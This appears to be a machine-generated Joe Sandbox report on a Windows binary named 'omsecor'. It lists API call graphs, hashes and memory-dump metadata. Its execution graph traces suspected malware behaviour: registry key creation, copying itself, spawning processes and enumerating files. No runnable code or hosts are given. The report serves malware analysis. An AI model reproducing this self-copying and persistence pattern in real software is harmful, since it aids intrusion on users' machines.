                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 358 403d9d-403da4 350->358 353 403c1b-403c26 352->353 354 403cac-403cd0 call 405f60 352->354 353->352 356 403c28-403c2e 353->356 365 403cfc-403cff 354->365 359 403c34-403c3a 356->359 360 403d9a 356->360 361 403da5 call 401662 358->361 359->360 363 403c40-403c4c IsValidCodePage 359->363 360->358 364 403daa-403dab 361->364 363->360 366 403c52-403c5f GetCPInfo 363->366 367 403d01-403d11 365->367 368 403cd2-403cd7 365->368 370 403c65-403c83 call 405f60 366->370 371 403d8e-403d94 366->371 367->365 372 403d13-403d32 call 403825 367->372 368->367 369 403cd9-403cdf 368->369 373 403cf3-403cf5 369->373 380 403d81 370->380 381 403c89-403c8d 370->381 371->350 371->360 382 403d33-403d3e 372->382 376 403ce1-403cf2 373->376 377 403cf7-403cfb 373->377 376->373 377->365 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 387 403d6a-403d6f 384->387 388 403c96-403c9a 385->388 396 403d4c-403d51 386->396 387->387 390 403d71-403d7f call 403825 387->390 388->384 391 403ca0-403ca7 388->391 390->383 394 403d52-403d54 391->394 395 403d56-403d5c 394->395 394->396 395->384 395->388 396->394
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 403 401ac7-401ad4 TlsGetValue 399->403 401 401b12-401b17 400->401 402 401aef-401af6 call 401a3e 400->402 402->401 407 401af8-401afe GetProcAddress 402->407 403->400 408 401ad6-401adc 403->408 409 401b04-401b06 407->409 408->409 409->401 410 401b08-401b0e 409->410 410->401
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 422 401b4d-401b53 415->422 416->417 421 401b6f-401b75 GetProcAddress 416->421 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(020E1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage:7.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1147
                          Total number of Limit Nodes:5
                          execution_graph 6128 404ec0 6152 40821c 6128->6152 6130 404edf 6131 404f04 6130->6131 6132 404ef4 6130->6132 6135 404efd 6130->6135 6159 40c519 6131->6159 6155 404e7b 6132->6155 6136 405111 6137 40c5b9 SysFreeString 6136->6137 6137->6135 6138 4050f2 6178 40c5b9 6138->6178 6141 40c5b9 SysFreeString 6142 405103 6141->6142 6143 40c5b9 SysFreeString 6142->6143 6144 405109 6143->6144 6145 40c5b9 SysFreeString 6144->6145 6145->6136 6146 404f0b 6146->6135 6146->6136 6146->6138 6166 40c43d 6146->6166 6151 4050e2 6175 40be3a 6151->6175 6153 408220 6152->6153 6154 408233 PathCombineW 6152->6154 6153->6154 6154->6130 6156 404e93 6155->6156 6181 408248 6156->6181 6195 40c4b4 CoCreateInstance 6159->6195 6162 40c531 VariantInit SysAllocString 6163 40c589 6162->6163 6164 40c551 VariantClear 6162->6164 6163->6146 6164->6163 6197 40bf60 6166->6197 6169 4050ce 6169->6151 6171 40c00b 6169->6171 6170 40be3a HeapFree 6170->6169 6172 40c01a 6171->6172 6174 40c03b 6171->6174 6173 40bde1 3 API calls 6172->6173 6173->6174 6174->6151 6176 40be41 HeapFree 6175->6176 6177 40be53 6175->6177 6176->6177 6177->6138 6179 40c5c0 SysFreeString 6178->6179 6180 4050fb 6178->6180 6179->6180 6180->6141 6182 40821c PathCombineW 6181->6182 6183 408268 6182->6183 6184 408272 FindFirstFileW 6183->6184 6185 404eb9 6183->6185 6184->6185 6192 408292 6184->6192 6185->6135 6186 4082a2 WaitForSingleObject 6187 4083b6 FindClose 6186->6187 6186->6192 6187->6185 6188 40839e FindNextFileW 6188->6187 6188->6192 6189 408306 PathMatchSpecW 6189->6192 6190 40821c PathCombineW 6190->6192 6191 408374 Sleep 6191->6192 6192->6186 6192->6187 6192->6188 6192->6189 6192->6190 6192->6191 6193 40833f Sleep 6192->6193 6194 408248 PathCombineW 6192->6194 6193->6192 6194->6192 6196 40c4dd 6195->6196 6196->6162 6196->6163 6198 40bf72 6197->6198 6199 40bfbf 6198->6199 6201 40bfa7 wvnsprintfW 6198->6201 6202 40bde1 6198->6202 6199->6169 6199->6170 6201->6198 6203 40bdf2 6202->6203 6204 40bde5 6202->6204 6206 40be0c HeapReAlloc 6203->6206 6207 40bdfc HeapAlloc 6203->6207 6205 40be3a HeapFree 6204->6205 6208 40bdec 6205->6208 6206->6208 6207->6208 6208->6198 6839 409402 6840 409415 6839->6840 6841 409419 6840->6841 6842 409437 SysFreeString 6840->6842 6842->6841 6843 409883 6844 409890 6843->6844 6845 409655 __VEC_memcpy 6844->6845 6846 4098ad 6845->6846 6847 409655 __VEC_memcpy 6846->6847 6848 4098c7 6846->6848 6847->6848 6209 409445 6211 40945a 6209->6211 6210 40945e 6211->6210 6212 4094a0 SysFreeString SysFreeString 6211->6212 6212->6210 5720 40b346 5766 40d5b0 5720->5766 5723 40b37e 5756 40b3db 5723->5756 5812 40ac20 RegOpenKeyExW 5723->5812 5727 40b394 GetModuleFileNameW 5820 4069fd RegCreateKeyExW 5727->5820 5732 40b3c5 5824 40a786 5732->5824 5733 40b3ca GetLastError 5733->5732 5734 40b3f2 Sleep 5735 40a786 35 API calls 5734->5735 5737 40b407 GetModuleFileNameW 5735->5737 5739 40ac20 4 API calls 5737->5739 5740 40b3d8 5739->5740 5744 40b426 CopyFileW 5740->5744 5740->5756 5741 40b45c 5743 40ac20 4 API calls 5741->5743 5745 40b468 5743->5745 5746 40b43f 5744->5746 5744->5756 5749 407727 54 API calls 5745->5749 5751 4077f0 CreateProcessW 5746->5751 5747 40b4b9 ExpandEnvironmentStringsW 5747->5756 5748 40b4cf GetModuleFileNameW 5748->5740 5750 40b474 5749->5750 5753 40b498 GetLastError 5750->5753 5754 40b47a 5750->5754 5755 40b44b 5751->5755 5758 40b4a3 5753->5758 5757 4077f0 CreateProcessW 5754->5757 5759 40b44c ExitProcess 5755->5759 5756->5734 5756->5741 5756->5747 5756->5748 5756->5759 5760 40b4fe GetLastError 5756->5760 5768 40b2ce OleInitialize 5756->5768 5777 40aafd 5756->5777 5786 40ab7c GetModuleFileNameW CharLowerW 5756->5786 5791 40abd9 5756->5791 5797 407727 5756->5797 5809 4077f0 5756->5809 5761 40b486 5757->5761 5762 40a786 35 API calls 5758->5762 5763 40a786 35 API calls 5760->5763 5761->5759 5764 40b48b GetLastError 5761->5764 5765 40b4a8 5762->5765 5763->5756 5764->5758 5765->5759 5767 40b353 GetModuleFileNameW 5766->5767 5767->5723 5770 40b2e2 5768->5770 5772 40b325 InternetCloseHandle 5770->5772 5840 407552 5770->5840 5843 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5770->5843 5848 40ac93 5770->5848 5865 40b096 5770->5865 5901 40a6c9 5772->5901 5778 40d5b0 5777->5778 5779 40ab0a GetCommandLineW 5778->5779 5780 40ab1a 5779->5780 5781 40ac20 4 API calls 5780->5781 5784 40ab1f 5780->5784 5782 40ab30 5781->5782 5783 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5782->5783 5782->5784 5785 40ab73 5783->5785 5784->5756 5785->5784 5787 40abb6 5786->5787 5788 40abc0 GetCommandLineW 5787->5788 5789 40abbb 5787->5789 5790 40abd0 5788->5790 5789->5756 5790->5756 5792 40ac20 4 API calls 5791->5792 5793 40abf2 5792->5793 5794 40abf7 FindFirstFileW 5793->5794 5795 40ac1a 5793->5795 5794->5795 5796 40ac0e FindClose 5794->5796 5795->5756 5796->5795 5798 40d5b0 5797->5798 5799 407731 GetModuleFileNameW 5798->5799 5800 407753 5799->5800 5806 40776d 5799->5806 5801 4075d4 15 API calls 5800->5801 5804 407764 5801->5804 5802 407774 ExpandEnvironmentStringsW 6114 4075d4 CreateFileW 5802->6114 5804->5756 5805 4077a7 GetLastError 5805->5806 5806->5802 5806->5804 5806->5805 5807 4077bc GetLastError 5806->5807 5808 40a786 35 API calls 5806->5808 5807->5806 5808->5806 6124 40d530 5809->6124 5811 407805 CreateProcessW 5811->5756 5813 40ac60 RegOpenKeyExW 5812->5813 5814 40ac4a 5812->5814 5816 40ac78 5813->5816 5817 40ac7c 5813->5817 6126 4069c0 RegQueryValueExW RegCloseKey 5814->6126 5816->5727 5816->5756 6127 4069c0 RegQueryValueExW RegCloseKey 5817->6127 5819 40ac5a 5819->5813 5819->5816 5821 406a30 5820->5821 5822 406a2c 5820->5822 5823 406a39 RegSetValueExW RegCloseKey 5821->5823 5822->5732 5822->5733 5823->5822 5826 40a79c 5824->5826 5828 40a7b3 5824->5828 5825 406d14 2 API calls 5825->5826 